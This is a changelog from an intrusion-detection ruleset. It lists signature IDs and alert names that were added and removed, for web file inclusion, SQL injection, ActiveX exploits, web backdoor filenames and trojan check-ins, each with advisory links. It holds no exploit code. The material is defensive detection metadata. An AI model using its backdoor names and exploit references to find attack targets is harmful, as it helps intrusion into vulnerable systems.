WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009327 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Geovision || url,doc.emergingthreats.net/2009328 || url,milw0rm.com/exploits/8206 || bugtraq,34115 2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Zabbix || url,doc.emergingthreats.net/2009329 || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/ 2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_MyForum || url,doc.emergingthreats.net/2009330 || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938 2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_tinyCMS || url,doc.emergingthreats.net/2009331 || bugtraq,30785 || url,milw0rm.com/exploits/6287 2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009332 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/ 2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009333 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/ 2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Monrovia_Barcode || url,doc.emergingthreats.net/2009334 || bugtraq,23934 || url,milw0rm.com/exploits/8208 2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NicLOR || url,doc.emergingthreats.net/2009335 || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112 2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009336 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || 
url,doc.emergingthreats.net/2009337 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009338 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009339 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009340 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009341 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009342 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009343 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009344 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || 
url,doc.emergingthreats.net/2009345 2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009346 2009347 || ET TROJAN Tigger.a/Syzor Checkin 2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/ -> Added to emerging-sid-msg.map.txt (60): 2001621 || ET WEB Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953 2001716 || ET WEB_SPECIFIC IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716 2001810 || ET WEB Explit PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810 2002838 || ET WEB_SPECIFIC Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2003520 || ET WEB EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957 2007611 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611 
2007612 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612 2007613 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613 2007614 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614 2007950 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950 2008142 || ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142 2008278 || ET TROJAN Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1 2008379 || ET TROJAN Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379 2008973 || ET TROJAN onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973 2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126 2009156 || ET TROJAN Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 
|| url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094 2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009306 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009307 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009308 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009309 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009310 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009311 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009312 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File 
Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009313 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Orbit || url,doc.emergingthreats.net/2009314 || url,milw0rm.com/exploits/8257 || bugtraq,34200 2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PrecisionID || url,doc.emergingthreats.net/2009315 || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332 2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_YapBB || url,doc.emergingthreats.net/2009316 || bugtraq,30686 2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009317 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649 2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009318 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649 2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DeZine || url,doc.emergingthreats.net/2009319 || url,milw0rm.com/exploits/7722 || bugtraq,33194 2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009320 || url,milw0rm.com/exploits/7978 || bugtraq,33621 2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009321 || url,milw0rm.com/exploits/7978 || bugtraq,33621 2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_SupportSoft || url,doc.emergingthreats.net/2009322 || url,milw0rm.com/exploits/8160 || bugtraq,34004 2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009323 || url,milw0rm.com/exploits/8124 || bugtraq,33933 2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009324 || url,milw0rm.com/exploits/8124 || bugtraq,33933 2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009325 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009326 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || 
url,doc.emergingthreats.net/2009327 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Geovision || url,doc.emergingthreats.net/2009328 || url,milw0rm.com/exploits/8206 || bugtraq,34115 2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Zabbix || url,doc.emergingthreats.net/2009329 || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/ 2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_MyForum || url,doc.emergingthreats.net/2009330 || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938 2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_tinyCMS || url,doc.emergingthreats.net/2009331 || bugtraq,30785 || url,milw0rm.com/exploits/6287 2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009332 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/ 2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009333 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/ 2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Monrovia_Barcode || url,doc.emergingthreats.net/2009334 || 
bugtraq,23934 || url,milw0rm.com/exploits/8208
2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NicLOR || url,doc.emergingthreats.net/2009335 || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009336 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009337 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009338 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009339 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009340 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009341 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009342 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009343 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009344 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009345
2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009346
2009347 || ET TROJAN Tigger.a/Syzor Checkin
2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/

-> Added to emerging.rules (1):
#by Veerendra at secpod.com
[---]

Removed non-rule lines:
[---]

-> Removed from emerging-sid-msg.map (71):
2001621 || ET Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953
2001716 || ET Web IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716
2001810 || ET EXPLOIT WEB PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810
2002838 || ET Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
2002849 || ET WEB-MISC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
2003520 || ET EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957
2007611 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611
2007612 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612
2007613 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613
2007614 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614
2007950 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950
2008142 || ET MALWARE Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142
2008278 || ET MALWARE Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1
2008379 || ET MALWARE Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379
2008505 || ET MALWARE Adaware.BarACE Checkin and Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_BarAce || url,doc.emergingthreats.net/2008505 || url,www.symantec.com/security_response/writeup.jsp?docid=2007-021714-2431-99&tabid=2
2008973 || ET MALWARE onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973
2009126 || ET Malware Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126
2009156 || ET MALWARE Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094
2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,milw0rm.com/exploits/8257 || bugtraq,34200
2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || bugtraq,30686
2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,milw0rm.com/exploits/7722 || bugtraq,33194
2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,milw0rm.com/exploits/8160 || bugtraq,34004
2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,milw0rm.com/exploits/8124 || bugtraq,33933
2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,milw0rm.com/exploits/8124 || bugtraq,33933
2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
